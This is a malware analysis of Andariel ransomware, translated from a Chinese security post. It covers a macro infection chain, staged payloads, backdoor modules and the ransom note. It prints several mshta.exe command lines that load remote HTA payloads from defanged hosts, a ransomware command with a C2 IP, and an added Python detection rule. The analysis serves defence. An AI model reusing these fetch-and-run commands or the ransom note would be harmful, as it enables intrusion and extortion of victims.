Background
Initial attack or propagation
- The user opens the malicious document and then allows the macro to run;
- A pop-up message box is displayed;
- The current document is saved in HTML format under the path %temp%, so that all of its image files are written to the same directory;
- The decoy document is displayed;
- %temp%\[document name]\image003.png is converted to the BMP file format and given the extension .zip;
- image003.zip, which actually contains HTML Application (HTA) code, is executed with mshta.exe;
- The temporary files created earlier are deleted.
Observed mshta.exe command lines:

- "C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "hxxp://www.jinjinpig.co[.]kr/AnyCss/skin.html" /print
- "C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "hxxp://adame.ypelec.co[.]kr/customize/ypelec/images/skin.html" /print
- "C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "hxxp://www.allamwith[.]com/home/css/skin.html" /print
- "C:\Program Files\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "hxxp://www.conkorea[.]com/cshop/skin/skin.html" /print
Second-stage payload: simple proxy
- Creates a mutex named Microsoft32;
- Resolves API addresses: base64 decoding followed by RC4 decryption with the key MicrosoftCorporationValidation@#$%^&*()!US;
- Retrieves the C2 address: base64 decoding followed by custom XOR decryption;
- Communicates with the C2.
Third-stage payload: backdoor
- sbiedll.dll: Sandboxie module;
- api_log.dll: SunBelt Sandboxie module;
- dir_watch.dll: SunBelt Sandboxie module.
- ModuleUpdate: replaces the current module by means of a batch file;
- ModuleShell: executes Windows commands, changes the working directory, connects to a given IP address;
- ModuleFileManager: obtains disk information, file listings, file operations;
- ModuleScreenCapture: takes screenshots.
Ransomware
- c:\temp\mshelp.exe d: -s 23.229.111[.]197 3569 sanjgold847@protonmail[.]com 12345 12345FDDEE5566778899AABB
Ransom note text:

    Attention! Attention! Attention!
    Your documents, photos, databases and other important files are encrypted and have the extension : [extension]
    Don't worry, you can return all your files!
    If you want to decrypt all your encrypted files, the only method of recovering files is to purchase decrypt tool and unique key for you.
    You just need little bitcoin.
    This software will decrypt all your encrypted files.
    To get this software you need write on our e - mail : [Attacker's email address]
    What gurantees do we give to you?
    It's just a business. We absolutely do not care about you and your deals, except getting benefits.
    You can send 2 your encrypted file from your PC with your ID and decrypt it for free.
    + -- - Warning-- - +
    Don't try to change files by yourself, Don't use any third party software for restoring your data.
    You ID : [24 characters victim ID]
Victims
- When checking network connections with the "netstat" command, both cases use the "-naop" option together with "tcp";
- When filtering the results, both cases use the "findstr" command rather than "find".
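The infection chain above (mshta.exe reached through a path-traversal image path, loading a remote HTA or a renamed .zip from %temp%) and the netstat "-naop tcp" habit are both visible in process-creation telemetry. The following detection logic is an added example, not code from the original post; the sample events are constructed, with placeholder hosts standing in for the domains quoted above.

```python
import re

# Constructed process-creation events, "parent|command line" (not from the report).
# The mshta lines mirror the shape of the commands quoted in the post.
SAMPLE_EVENTS = [
    r'explorer.exe|"C:\Program Files (x86)\Unidocs\ezPDFReader2.0G\..\..\..\Windows\System32\mshta.exe" "http://example.invalid/AnyCss/skin.html" /print',
    r'WINWORD.EXE|mshta.exe "C:\Users\user\AppData\Local\Temp\report_files\image003.zip"',
    r'cmd.exe|netstat -naop tcp',
    r'cmd.exe|findstr 3569',
    r'explorer.exe|"C:\Windows\System32\mshta.exe" "C:\Tools\legit.hta"',
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
ARG_RE = re.compile(r'"([^"]+)"|(\S+)')


def split_args(cmdline):
    """Split a Windows command line into quoted or whitespace-separated tokens."""
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def detect(event):
    """Return the rule names an event triggers (empty list when nothing matches)."""
    _parent, _, cmdline = event.partition("|")
    args = split_args(cmdline)
    if not args:
        return []
    image = args[0].lower()
    hits = []
    if image.endswith("mshta.exe"):
        # "\..\" segments hide the real binary behind a trusted install directory.
        if "\\..\\" in image:
            hits.append("mshta_path_traversal")
        for arg in args[1:]:
            if URL_RE.match(arg):
                hits.append("mshta_remote_hta")
            elif "\\" in arg and not arg.lower().endswith((".hta", ".htm", ".html")):
                # HTA content under an unrelated extension (.zip in the report).
                hits.append("mshta_non_hta_extension")
    # Weak indicator on its own; useful for correlation with the hits above.
    if image == "netstat" and "-naop" in args and "tcp" in args:
        hits.append("netstat_naop_tcp")
    return hits


def scan(events):
    """Map event index -> triggered rules, keeping only events with at least one hit."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}
```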
Summary
This article was first published on the WeChat public account 关键基础设施安全应急响应中心 (Critical Infrastructure Security Emergency Response Center): Ransomware developed by the Andariel group is stirring up trouble again